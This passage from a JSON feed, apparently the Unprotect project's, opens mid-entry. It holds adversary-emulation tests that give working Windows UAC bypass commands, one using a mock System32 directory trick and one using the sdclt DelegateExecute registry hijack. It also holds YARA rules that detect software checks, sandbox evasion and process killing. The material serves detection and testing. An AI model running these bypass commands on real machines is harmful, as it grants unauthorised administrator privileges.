\"\\\\?\\C:\\Windows \\System32\\\"\r\n      copy \"#{executable_binary}\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n      mklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n    cleanup_command: |\r\n      rd \"\\\\?\\C:\\Windows \\\" /S /Q >nul 2>nul\r\n      del \"c:\\testbypass.exe\" >nul 2>nul\r\n    name: command_prompt\r\n    elevation_required: true\r\n- name: Bypass UAC using sdclt DelegateExecute\r\n  auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7\r\n  description: |\r\n    Bypasses User Account Control using a fileless method, registry only. \r\n    Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\r\n    [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\r\n    Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    command.to.execute:\r\n      description: Command to execute\r\n      type: string\r\n      default: cmd.exe /c notepad.exe\r\n  executor:\r\n    command: |\r\n      New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value '#{command.to.execute}'\r\n      New-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\r\n      Start-Process -FilePath $env:windir\\system32\\sdclt.exe\r\n      Start-Sleep -s 3\r\n    cleanup_command: |\r\n      Remove-Item -Path \"HKCU:\\Software\\Classes\\Folder\" -Recurse -Force -ErrorAction Ignore\r\n    name: powershell"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_Check_installed_software",
            "rule": "import \"pe\"\r\n\r\nrule check_installed_software {\r\n    meta:\r\n        description = \"Detect check installed software through registry\"\r\n        author = \"Thomas Roccia | @fr0gger_\"\r\n    strings:\r\n        $s1 = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\" wide\r\n\r\n    condition:\r\n       uint16(0) == 0x5A4D and $s1 or\r\n       pe.imports(\"Advapi32.dll\", \"RegQueryValueEx\")\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_Detect_Possible_GetForegroundWindow_Evasion",
            "rule": "import \"pe\"\r\n \r\nrule UNPROTECT_Possible_GetForegroundWindow_Evasion\r\n{\r\n    meta:\r\n        description = \"Attempts to detect possible usage of sandbox evasion techniques using GetForegroundWindow API, based on module imports.\"\r\n        author = \"Kyle Cucci\"\r\n        date = \"2020-09-30\"\r\n \r\n    condition:\r\n        uint16(0) == 0x5A4D and\r\n        pe.imports(\"user32.dll\", \"GetForegroundWindow\") and\r\n        pe.imports(\"kernel32.dll\", \"Sleep\")\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_disable_process",
            "rule": "import \"pe\"\r\n\r\nrule UNPROTECT_disable_process\r\n{\r\n    meta:\r\n\tauthor = \"Thomas Roccia | @fr0gger_\"\r\n\tdescription = \"Disable blacklisted processes\"\r\n\r\n    strings:\r\n        $api1 = \"CreateToolhelp32Snapshot\" nocase\r\n        $api2 = \"Process32First\" nocase\r\n        $api3 = \"Process32Next\" nocase\r\n\r\n        $p1 = \"taskkill.exe\" nocase\r\n        $p2 = \"tskill.exe\" nocase\r\n\r\ncondition:\r\n        uint32(uint32(0x3C)) == 0x4550 and 3 of ($api*) or any of ($p*) \r\n}"
        }
    ]
}